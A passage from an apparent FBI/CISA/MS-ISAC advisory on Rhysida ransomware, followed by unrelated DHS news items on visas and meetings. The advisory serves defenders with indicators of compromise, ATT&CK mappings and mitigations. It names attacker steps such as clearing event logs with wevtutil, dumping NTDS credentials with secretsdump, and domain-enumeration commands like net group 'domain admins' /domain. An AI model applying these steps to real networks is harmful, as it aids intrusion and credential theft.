A standard Windows Event Utility tool used to view event logs. Rhysida actors used this tool to clear a significant number of Windows event logs, including system, application, and security logs [T1070.001].

PowerView

A PowerShell tool used to gain situational awareness of Windows domains. Review of PowerShell event logs identified Rhysida actors using this tool to conduct additional reconnaissance-based commands and harvest credentials.

Rhysida Ransomware Characteristics

Execution

In one investigation, Rhysida actors created two folders in the C: drive labeled in and out, which served as a staging directory (central location) for hosting malicious executables. The in folder contained file names in accordance with host names on the victim’s network, likely imported through a scanning tool. The out folder contained various files listed in Table 2 below. Rhysida actors deployed these tools and scripts to assist system and network-wide encryption.

Table 2: Malicious Executables Affiliated with Rhysida Infections

File Name

Hash (SHA256)

Description

conhost.exe

6633fa85bb234a75927b23417313e51a4c155e12f71da3959e168851a600b010

A ransomware binary.

psexec.exe

078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b

A file used to execute a process on a remote or local host.

S_0.bat

1c4978cd5d750a2985da9b58db137fc74d28422f1e087fd77642faa7efe7b597

A batch script likely used to place 1.ps1 on victim systems for ransomware staging purposes [T1059.003].

1.ps1

4e34b9442f825a16d7f6557193426ae7a18899ed46d3b896f6e4357367276183

Identifies an extension block list of files to encrypt and not encrypt.

S_1.bat

97766464d0f2f91b82b557ac656ab82e15cae7896b1d8c98632ca53c15cf06c4

A batch script that copies conhost.exe (the encryption binary) on an imported list of host names within the C:WindowsTemp directory of each system.

S_2.bat

918784e25bd24192ce4e999538be96898558660659e3c624a5f27857784cd7e1

Executes conhost.exe on compromised victim systems, which encrypts and appends the extension of .Rhysida across the environment.

Rhysida ransomware uses a Windows 64-bit Portable Executable (PE) or common object file format (COFF) compiled using MinGW via the GNU Compiler Collection (GCC), which supports various programming languages such as C, C++, and Go. The cryptographic ransomware application first injects the PE into running processes on the compromised system [T1055.002]. Additionally, third-party researchers identified evidence of Rhysida actors developing custom tools with program names set to “Rhysida-0.1” [T1587].

Encryption

After mapping the network, the ransomware encrypts data using a 4096-bit RSA encryption key with a ChaCha20 algorithm [T1486]. The algorithm features a 256-bit key, a 32-bit counter, and a 96-bit nonce along with a four-by-four matrix of 32-bit words in plain text. Registry modification commands [T1112] are not obfuscated, displayed as plain-text strings and executed via cmd.exe.

Rhysida’s encryptor runs a file to encrypt and modify all encrypted files to display a .rhysida extension.[5] Following encryption, a PowerShell command deletes the binary [T1070.004] from the network using a hidden command window [T1564.003]. The Rhysida encryptor allows arguments -d (select a directory) and -sr (file deletion), defined by the authors of the code as parseOptions.[6] After the lines of binary strings complete their tasks, they delete themselves through the control panel to evade detection.

Data Extortion

Rhysida actors reportedly engage in “double extortion” [T1657]—demanding a ransom payment to decrypt victim data and threatening to publish the sensitive exfiltrated data unless the ransom is paid.[5],[7] Rhysida actors direct victims to send ransom payments in Bitcoin to cryptocurrency wallet addresses provided by the threat actors. As shown in Figure 1, Rhysida ransomware drops a ransom note named “CriticalBreachDetected” as a PDF file—the note provides each company with a unique code and instructions to contact the group via a Tor-based portal.

Figure 1: Rhysida Ransom Note

Identified in analysis and also listed in open source reporting, the contents of the ransom note are embedded as plain-text in the ransom binary, offering network defenders an opportunity to deploy string-based detection for alerting on evidence of the ransom note. Rhysida threat actors may target systems that do not use command-line operating systems. The format of the PDF ransom notes could indicate that Rhysida actors only target systems that are compatible with handling PDF documents.[8]

INDICATORS OF COMPROMISE

On November 10, 2023, Sophos published TTPs and IOCs identified from analysis conducted for six separate incidents.[9] The C2 IP addresses listed in Table 3 were derived directly from Sophos’ investigations and are listed on GitHub among other indicators.[10]

Table 3: C2 IP Addresses Used for Rhysida Operations

C2 IP Address

5.39.222[.]67

5.255.99[.]59

51.77.102[.]106

108.62.118[.]136

108.62.141[.]161

146.70.104[.]249

156.96.62[.]58

157.154.194[.]6

Additional IOCs were obtained from FBI, CISA, and the MS-ISAC’s investigations and analysis. The email addresses listed in Table 4 are associated with Rhysida actors’ operations. Rhysida actors have been observed creating Onion Mail email accounts for services or victim communication, commonly in the format: [First Name][Last Name]@onionmail[.]org.

Table 4: Email Addresses Used to Support Rhysida Operations

Email Address

rhysidaeverywhere@onionmail[.]org

rhysidaofficial@onionmail[.]org

Rhysida actors have also been observed using the following files and executables listed in Table 5 to support their operations.

Disclaimer: Organizations are encouraged to investigate the use of these files for related signs of compromise prior to performing remediation actions.

Table 5: Files Used to Support Rhysida Operations

File Name

Hash (SHA256)

Sock5.sh

48f559e00c472d9ffe3965ab92c6d298f8fb3a3f0d6d203cd2069bfca4bf3a57

PsExec64.exe

edfae1a69522f87b12c6dac3225d930e4848832e3c551ee1e7d31736bf4525ef

PsExec.exe

078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b

PsGetsid64.exe

201d8e77ccc2575d910d47042a986480b1da28cf0033e7ee726ad9d45ccf4daa

PsGetsid.exe

a48ac157609888471bf8578fb8b2aef6b0068f7e0742fccf2e0e288b0b2cfdfb

PsInfo64.exe

de73b73eeb156f877de61f4a6975d06759292ed69f31aaf06c9811f3311e03e7

PsInfo.exe

951b1b5fd5cb13cde159cebc7c60465587e2061363d1d8847ab78b6c4fba7501

PsLoggedon64.exe

fdadb6e15c52c41a31e3c22659dd490d5b616e017d1b1aa6070008ce09ed27ea

PsLoggedon.exe

d689cb1dbd2e4c06cd15e51a6871c406c595790ddcdcd7dc8d0401c7183720ef

PsService64.exe

554f523914cdbaed8b17527170502199c185bd69a41c81102c50dbb0e5e5a78d

PsService.exe

d3a816fe5d545a80e4639b34b90d92d1039eb71ef59e6e81b3c0e043a45b751c

Eula.txt

8329bcbadc7f81539a4969ca13f0be5b8eb7652b912324a1926fc9bfb6ec005a

psfile64.exe

be922312978a53c92a49fefd2c9f9cc098767b36f0e4d2e829d24725df65bc21

psfile.exe

4243dc8b991f5f8b3c0f233ca2110a1e03a1d716c3f51e88faf1d59b8242d329

pskill64.exe

7ba47558c99e18c2c6449be804b5e765c48d3a70ceaa04c1e0fae67ff1d7178d

pskill.exe

5ef168f83b55d2cbd2426afc5e6fa8161270fa6a2a312831332dc472c95dfa42

pslist64.exe

d3247f03dcd7b9335344ebba76a0b92370f32f1cb0e480c734da52db2bd8df60

pslist.exe

ed05f5d462767b3986583188000143f0eb24f7d89605523a28950e72e6b9039a

psloglist64.exe

5e55b4caf47a248a10abd009617684e969dbe5c448d087ee8178262aaab68636

psloglist.exe

dcdb9bd39b6014434190a9949dedf633726fdb470e95cc47cdaa47c1964b969f

pspasswd64.exe

8d950068f46a04e77ad6637c680cccf5d703a1828fbd6bdca513268af4f2170f

pspasswd.exe

6ed5d50cf9d07db73eaa92c5405f6b1bf670028c602c605dfa7d4fcb80ef0801

psping64.exe

d1f718d219930e57794bdadf9dda61406294b0759038cef282f7544b44b92285

psping.exe

355b4a82313074999bd8fa1332b1ed00034e63bd2a0d0367e2622f35d75cf140

psshutdown64.exe

4226738489c2a67852d51dbf96574f33e44e509bc265b950d495da79bb457400

psshutdown.exe

13fd3ad690c73cf0ad26c6716d4e9d1581b47c22fb7518b1d3bf9cfb8f9e9123

pssuspend64.exe

4bf8fbb7db583e1aacbf36c5f740d012c8321f221066cc68107031bd8b6bc1ee

pssuspend.exe

95a922e178075fb771066db4ab1bd70c7016f794709d514ab1c7f11500f016cd

PSTools.zip

a9ca77dfe03ce15004157727bb43ba66f00ceb215362c9b3d199f000edaa8d61

Pstools.chm

2813b6c07d17d25670163e0f66453b42d2f157bf2e42007806ebc6bb9d114acc

psversion.txt

8e43d1ddbd5c129055528a93f1e3fab0ecdf73a8a7ba9713dc4c3e216d7e5db4

psexesvc.exe

This artifact is created when a user establishes a connection using psexec. It is removed after the connection is terminated, which is why there is no hash available for this executable.

MITRE ATT&CK TACTICS AND TECHNIQUES

See Tables 6-15 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

Additional notable TTPs have been published by the Check Point Incident Response Team.[11]

Table 6: Resource Development

Technique Title

ID

Use

Develop Capabilities

T1587

Rhysida actors have been observed developing resources and custom tools, particularly with program names set to “Rhysida-0.1” to gain access to victim systems.

Table 7: Initial Access

Technique Title

ID

Use

Valid Accounts

T1078

Rhysida actors are known to use valid credentials to access internal VPN access points of victims.

Exploit Public-Facing Application

T1190

Rhysida actors have been identified exploiting Zerologon, a critical elevation of privilege vulnerability within Microsoft’s Netlogon Remote Protocol.

Phishing

T1566

Rhysida actors are known to conduct successful phishing attacks.

Table 8: Execution

Technique Title

ID

Use

Command and Scripting Interpreter: PowerShell

T1059.001

Rhysida actors used PowerShell commands (ipconfig, nltest, net) and various scripts to execute malicious actions.

Command and Scripting Interpreter: Windows Command Shell

T1059.003

Rhysida actors used batch scripting to place 1.ps1 on victim systems to automate ransomware execution.

Table 9: Privilege Escalation

Technique Title

ID

Use

Process Injection: Portable Executable Injection

T1055.002

Rhysida actors injected a Windows 64-bit PE cryptographic ransomware application into running processes on compromised systems.

Table 10: Defense Evasion

Technique Title

ID

Use

Indicator Removal: Clear Windows Event Logs

T1070.001

Rhysida actors used wevtutil.exe to clear Windows event logs, including system, application, and security logs.

Indicator Removal: File Deletion

T1070.004

Rhysida actors used PowerShell commands to delete binary strings.

Hide Artifacts: Hidden Window

T1564.003

Rhysida actors have executed hidden PowerShell windows.

Table 11: Credential Access

Technique Title

ID

Use

OS Credential Dumping: NTDS

T1003.003

Rhysida actors have been observed using secretsdump to extract credentials and other confidential information from a system, then dumping NTDS credentials.

Modify Registry

T1112

Rhysida actors were observed running registry modification commands via cmd.exe.

Table 12: Discovery

Technique Title

ID

Use

System Network Configuration Discovery

T1016

Rhysida actors used the ipconfig command to enumerate victim system network settings.

Remote System Discovery

T1018

Rhysida actors used the command net group “domain computers” /domain to enumerate servers on a victim domain.

System Owner/User Discovery

T1033

Rhysida actors leveraged whoami and various net commands within PowerShell to identify logged-in users.

Permission Groups Discovery: Local Groups

T1069.001

Rhysida actors used the command net localgroup administrators to identify accounts with local administrator rights.

Permission Groups Discovery: Domain Groups

T1069.002

Rhysida actors used the command net group “domain admins” /domain to identify domain administrators.

Account Discovery: Domain Account

T1087.002

Rhysida actors used the command net user [username] /domain to identify account information.

Domain Trust Discovery

T1482

Rhysida actors used the Windows utility nltest to enumerate domain trusts.

Table 13: Lateral Movement

Technique Title

ID

Use

Remote Services: Remote Desktop Protocol

T1021.001

Rhysida actors are known to use RDP for lateral movement.

Remote Services: SSH

T1021.004

Rhysida actors used compromised user credentials to leverage PuTTy and remotely connect to victim systems via SSH.

Table 14: Command and Control

Technique Title

ID

Use

Remote Access Software

T1219

Rhysida actors have been observed using the AnyDesk software to obtain remote access to victim systems and maintain persistence.

Table 15: Impact

Technique Title

ID

Use

Data Encrypted for Impact

T1486

Rhysida actors encrypted victim data using a 4096-bit RSA encryption key that implements a ChaCha20 algorithm.

Financial Theft

T1657

Rhysida actors reportedly engage in “double extortion”— demanding a ransom payment to decrypt victim data and threatening to publish the sensitive exfiltrated data unless the ransom is paid.

MITIGATIONS

FBI, CISA, and the MS-ISAC recommend that organizations implement the mitigations below to improve your organization’s cybersecurity posture. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, and TTPs. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

These mitigations apply to all critical infrastructure organizations and network defenders. FBI, CISA, and the MS-ISAC recommend incorporating secure-by-design and -default principles, limiting the impact of ransomware techniques and strengthening overall security posture. For more information on secure by design, see CISA’s Secure by Design webpage.

  • Require phishing-resistant MFA for all services to the extent possible, particularly for webmail, VPN, and accounts that access critical systems [CPG 2.H].
  • Disable command-line and scripting activities and permissions. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally [CPG 2.N].
  • Implement verbose and enhanced logging within processes such as command line auditing[12] and process tracking[13].
  • Restrict the use of PowerShell using Group Policy and only grant access to specific users on a case-by-case basis. Typically, only those users or administrators who manage the network or Windows operating systems should be permitted to use PowerShell [CPG 2.E].
  • Update Windows PowerShell or PowerShell Core to the latest version and uninstall all earlier PowerShell versions. Logs from Windows PowerShell prior to version 5.0 are either non-existent or do not record enough detail to aid in enterprise monitoring and incident response activities [CPG 1.E, 2.S, 2.T].
  • Enable enhanced PowerShell logging [CPG 2.T, 2.U].
    • PowerShell logs contain valuable data, including historical operating system and registry interaction and possible TTPs of a threat actor’s PowerShell use.
    • Ensure PowerShell instances (using the latest version) have module, script block, and transcription logging enabled (e.g., enhanced logging).
    • The two logs that record PowerShell activity are the PowerShell Windows event log and the PowerShell operational log. FBI, CISA, and the MS-ISAC recommend turning on these two Windows event logs with a retention period of at least 180 days. These logs should be checked on a regular basis to confirm whether the log data has been deleted or logging has been turned off. Set the storage size permitted for both logs to as large as possible.
  • Restrict the use of RDP and other remote desktop services to known user accounts and groups. If RDP is necessary, apply best practices such as [CPG 2.W]:
    • Implement MFA for privileged accounts using RDP.
    • Use Remote Credential Guard[14] to protect credentials, particularly domain administrator or other high value accounts.
    • Audit the network for systems using RDP.
    • Close unused RDP ports.
    • Enforce account lockouts after a specified number of attempts.
    • Log RDP login attempts.
  • Secure remote access tools by:
    • Implementing application controls to manage and control execution of software, including allowlisting remote access programs. Application controls should prevent the installation and execution of portable versions of unauthorized remote access and other software. A properly configured application allowlisting solution will block any unlisted application execution. Allowlisting is important as antivirus solutions may fail to detect the execution of malicious portable executables when the files use any combination of compression, encryption, or obfuscation.
    • Apply the recommendations in CISA’s joint Guide to Securing Remote Access Software.

In addition, FBI, CISA, and the MS-ISAC recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the impact and risk of compromise by ransomware or data extortion actors:

  • Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Prioritize patching known exploited vulnerabilities in internet-facing systems [CPG 1.E].
  • Segment networks to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement [CPG 2.F].
  • Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a network monitoring tool. To aid in detecting ransomware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host [CPG 3.A].
  • Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege (PoLP) [CPG 2.E].
  • Implement time-based access for accounts set at the admin level and higher [CPG 2.A, 2.E]. For example, the just-in-time (JIT) access method provisions privileged access when needed and can support the enforcement of PoLP (as well as the zero trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the AD level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.
  • Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (e.g., hard drive, storage device, or the cloud).
  • Maintain offline backups of data and regularly maintain backups and their restoration (daily or weekly at minimum). By instituting this practice, organizations limit the severity of disruption to business operations [CPG 2.R].
  • Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure [CPG 2.K, 2.L, 2.R].
  • Forward log files to a hardened centralized logging server, preferably on a segmented network [CPG 2.F]. Review logging retention rates, such as for VPNs and network-based logs.
  • Consider adding an email banner to emails received from outside your organization [CPG 2.M].
  • Disable hyperlinks in received emails.

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, FBI, CISA, and the MS-ISAC recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. FBI, CISA, and the MS-ISAC recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

  1. Select an ATT&CK technique described in this advisory (see Tables 6-15).
  2. Align your security technologies against the technique.
  3. Test your technologies against the technique.
  4. Analyze your detection and prevention technologies’ performance.
  5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
  6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

FBI, CISA, and the MS-ISAC recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

RESOURCES

REPORTING

FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Rhysida actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.

Additional details requested include: a targeted company point of contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host and network-based indicators.

FBI and CISA do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other threat actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, FBI and CISA urge you to promptly report ransomware incidents to the FBI’s Internet Crime Complaint Center (IC3) at Ic3.gov, a local FBI Field Office, or CISA via the agency’s Incident Reporting System or its 24/7 Operations Center at report@cisa.gov or (888) 282-0870.

REFERENCES

  1. Microsoft: DEV-0832 (Vice Society) Opportunistic Ransomware Campaigns Impacting US Education Sector
  2. FortiGuard Labs: Ransomware Roundup – Rhysida
  3. Microsoft: Security Update Guide – CVE-2020-1472
  4. Microsoft: Master File Table (Local File Systems)
  5. SentinelOne: Rhysida
  6. Secplicity: Scratching the Surface of Rhysida Ransomware
  7. Cisco Talos: What Cisco Talos Knows about the Rhysida Ransomware
  8. SOC Radar: Rhysida Ransomware Threat Profile
  9. Sophos: A Threat Cluster’s Switch from Vice Society to Rhysida
  10. Sophos: Vice Society – Rhysida IOCs (GitHub)
  11. Check Point Research: Rhysida Ransomware – Activity and Ties to Vice Society
  12. Microsoft: Command Line Process Auditing
  13. Microsoft: Audit Process Tracking
  14. Microsoft: Remote Credential Guard

ACKNOWLEDGEMENTS

Sophos contributed to this CSA.

DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. FBI, CISA, and the MS-ISAC do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI, CISA, and the MS-ISAC.

VERSION HISTORY

November 15, 2023: Initial version.

DPIAC Meeting November 7,2023

Source: US Department of Homeland Security

The Data Privacy and Integrity Advisory Committee (DPIAC) will hold a public meeting.

LOCATION: Conference Call ONLY. Consult the Agenda for the number.

RSVP: Members of the public who wish to attend are requested to register in advance by sending an email to: privacycommittee@hq.dhs.gov or calling 202-343-1717.

Consult the Federal Register for more details. Meeting materials can be found here.

DHS to Supplement H-2B Cap with Nearly 65,000 Additional Visas for FY 2024

Source: US Department of Homeland Security

News release originally published by the Department of Homeland Security.

 Increase Will Help Address the Need for Seasonal Workers and Reduce Irregular Migration

WASHINGTON Today, the Department of Homeland Security (DHS), in consultation with the Department of Labor (DOL), announced that it expects to make an additional 64,716 H-2B temporary nonagricultural worker visas available for Fiscal Year (FY) 2024, on top of the congressionally mandated 66,000 H-2B visas that are available each fiscal year. These additional H-2B visas represent the maximum permitted under the September 2023 Fiscal Year 2024 Continuing Resolution. American businesses in industries such as hospitality and tourism, landscaping, seafood processing, and more turn to seasonal or other temporary workers in the H-2B program to help them meet demand from consumers. The supplemental visa allocation will help address the need for seasonal or other temporary workers in areas where too few U.S. workers are available, helping contribute to the American economy. The H-2B visa expansion advances the Biden Administration’s pledge, under the Los Angeles Declaration for Migration and Protection, to expand lawful pathways as an alternative to irregular migration.

By announcing plans to make these supplemental visas available at the outset of FY 2024, the Departments will ensure U.S. businesses with workforce needs are able to plan ahead and find the seasonal and other temporary workers they need. At the same time, DHS and DOL have put in place robust protections for U.S. and foreign workers alike, including by ensuring that employers first seek out and recruit American workers for the jobs to be filled, as the visa program requires, and that foreign workers hired are not exploited by unscrupulous employers. Most recently, both DHS and DOL proposed regulations to further strengthen worker protections in the H-2A and H-2B visa programs, and the White House-led H-2B Worker Protection Taskforce released a report detailing new actions to be taken by Federal government agencies to strengthen protections for vulnerable H-2B and similarly situated U.S. workers.

“The Department of Homeland Security is committed to maintaining strong economic growth and meeting the labor demand in the United States, while strengthening worker protections for U.S. and foreign workers,” said Secretary of Homeland Security Alejandro N. Mayorkas. “We are using the tools that we have available to bolster the resiliency of our industries and release the maximum number of additional H-2B visas for U.S. businesses to ensure they can plan for their peak season labor needs. We also continue to take steps to strengthen protections for workers and safeguard the integrity of the program from unscrupulous employers who would seek to exploit workers by paying substandard wages and maintaining unsafe work conditions. Our maximum use of the H-2B visa program also continues to build on our commitment to expand lawful pathways as an alternative to irregular migration, thereby cutting out the ruthless smugglers who prey on the vulnerable.”

The H-2B supplemental is expected to include an allocation of 20,000 visas to workers from Colombia, Costa Rica, Ecuador, El Salvador, Guatemala, Haiti, and Honduras. This country specific allocation is part of the Biden-Harris Administration’s efforts to build a safe, orderly, and humane immigration system that includes expanding lawful pathways for immigration while strengthening consequences for those without a legal basis to remain in the United States.

In addition to the 20,000 country specific allocation, 44,716 supplemental visas would be available to returning workers who received an H-2B visa, or were otherwise granted H-2B status, during one of the last three fiscal years. The regulation would allocate these supplemental visas for returning workers between the first half and second half of the fiscal year to account for the need for additional seasonal and other temporary workers over the course of the year, with a portion of the second half allocation reserved to meet the demand for workers during the peak summer season.

The H-2B program permits employers to temporarily hire noncitizens to perform nonagricultural labor or services in the United States. The employment must be of a temporary nature, such as a one-time occurrence, seasonal need, or intermittent need. Employers seeking H-2B workers must take a series of steps to test the U.S. labor market. They must obtain certification from DOL that there are not enough U.S. workers who are able, willing, qualified, and available to perform the temporary work for which they seek a prospective foreign worker, and that employing H-2B workers will not adversely affect the wages and working conditions of similarly employed U.S. workers.

The maximum period of stay in H-2B classification is three years. A person who has held H-2B nonimmigrant status for a total of three years must depart and remain outside of the United States for an uninterrupted period of three months before seeking readmission as an H-2B nonimmigrant.

DHS and DOL are committed to protecting all H-2B workers from exploitation and abuse, and of ensuring, consistent with law, that employers do not refuse to hire or appropriately recruit U.S. workers who are able, willing, qualified, and available to perform the temporary work. The forthcoming temporary final rule implementing this allocation is expected to feature several provisions to protect both U.S. and H-2B workers.

Additional details on H-2B program safeguards, as well as eligibility and filing requirements, will be available in the temporary final rule when published and on the USCIS webpage.

Engagement with USCIS on the EB-5 Immigrant Investor Program

Source: US Department of Homeland Security

The Department of Homeland Security’s Office of the Citizenship and Immigration Services Ombudsman (CIS Ombudsman) invites you to participate in a joint webinar with U.S. Citizenship and Immigration Services (USCIS) on the EB-5 Immigrant Investor Program and implementation of the EB-5 Reform and Integrity Act of 2022 (RIA) on Monday, October 30, 2023, from 2 to 3 p.m. Eastern Time.

The RIA revised certain eligibility requirements for the EB-5 program and reformed the regional center program. During the webinar, staff from the CIS Ombudsman and USCIS’ Immigrant Investor Program Office will share information and seek feedback on USCIS’ recent policy guidance on changes made by the RIA and other EB-5 program updates.

During the webinar, participants will be able to submit questions and comments. The questions and comments will be reviewed and shared with USCIS to address, as appropriate, in future engagements or through other communications.

Why This Is Important

USCIS has provided additional guidance on its interpretation of changes to the EB-5 program in the Immigration and Nationality Act (INA) made by the RIA. USCIS published this guidance on October 11, 2023, on its EB-5 Questions and Answers (updated Oct. 2023) page.

The RIA added new protections for investors in terminated regional centers. USCIS will discuss the guidance for pre-RIA investors associated with regional centers that are terminated. Additionally, the RIA changed required investment timeframes for EB-5 investors who file for classification after the RIA went into effect. USCIS will cover these revised requirements.

To Join

Please join the webinar on Monday, October 30 at 2 p.m. Eastern Time by clicking on this Teams Live link. Registration is not required. For more information on attending a Teams event, see Microsoft’s Attend a live event in Teams page.

If you require a reasonable accommodation to participate in the webinar, please contact us by email at CISOmbudsman.publicaffairs@hq.dhs.gov no later than Wednesday, October 25, 2023. Live captions are available in Microsoft Teams, and you can learn more on the Use live captions in a Teams meeting page.

More Information

For more information on the EB-5 program, visit USCIS’ EB-5 Immigrant Investor Program page.

DHS Issues Proposed Rule to Modernize the H-1B Specialty Occupation Worker Program

Source: US Department of Homeland Security

USCIS seeks to update regulations with proposed rulemaking to improve program efficiency and integrity

WASHINGTON – Today, the Department of Homeland Security (DHS), through U.S. Citizenship and Immigration Services (USCIS), published a Notice of Proposed Rulemaking (NPRM) that would modernize the H-1B specialty occupation worker program by streamlining eligibility requirements, improving program efficiency, providing greater benefits and flexibilities for employers and workers, and strengthening integrity measures. The H-1B program helps U.S. employers hire the employees they need to meet their business needs and remain competitive in the global marketplace, while adhering to all U.S. worker protections under the law.

“DHS continues to develop and implement regulations that increase efficiency and improve processes for employers and workers navigating the immigration system,” said Secretary of Homeland Security Alejandro N. Mayorkas. “The Biden-Harris Administration’s priority is to attract global talent, reduce undue burdens on employers, and prevent fraud and abuse in the immigration system.”

The H-1B nonimmigrant visa program allows U.S. employers to temporarily employ foreign workers in specialty occupations, defined by statute as occupations that require highly specialized knowledge and a bachelor’s or higher degree in the specific specialty, or its equivalent.

The proposed rule would change how USCIS conducts the H-1B registration selection process to reduce the possibility of misuse and fraud. Under the current process, the more registrations that are submitted on behalf of an individual, the higher chance that individual will be selected in a lottery.  Under the new proposal, each unique individual who has a registration submitted on their behalf would be entered into the selection process once, regardless of the number of registrations submitted on their behalf. This would improve the chances that a legitimate registration would be selected by significantly reducing or eliminating the advantage of submitting multiple registrations for the same beneficiary solely to increase the chances of selection. Furthermore, it could also give beneficiaries more choice between legitimate job offers because each registrant who submitted a registration for a selected beneficiary would have the ability to file an H-1B petition on behalf of the beneficiary.

Among additional provisions, the proposed rule would improve the H-1B program by:

  • Streamlining eligibility requirements – criteria for specialty occupation positions would be revised to reduce confusion between the public and adjudicators and to clarify that a position may allow a range of degrees, although there must be a direct relationship between the required degree field(s) and the duties of the position;
  • Improving program efficiency –The proposed rule  codifies that adjudicators generally should defer to a prior determination when no underlying facts have changed at time of a new filing;
  • Providing greater benefits and flexibilities for employers and workers – certain exemptions to the H-1B cap would be expanded for certain nonprofit entities or governmental research organizations as well as beneficiaries who are not directly employed by a qualifying organization. DHS would also extend certain flexibilities for students on an F-1 visa when students are seeking to change their status to H-1B. Additionally, DHS would establish new H-1B eligibility requirements for rising entrepreneurs; and
  • Strengthening integrity measures – in addition to changing the selection process, misuse and fraud in the H-1B registration process would be reduced by prohibiting related entities from submitting multiple registrations for the same beneficiary. The rule would also codify USCIS’ authority to conduct site visits and clarify that refusal to comply with site visits may result in denial or revocation of the petition.

The 60-day public comment period starts following publication of the NPRM in the Federal Register.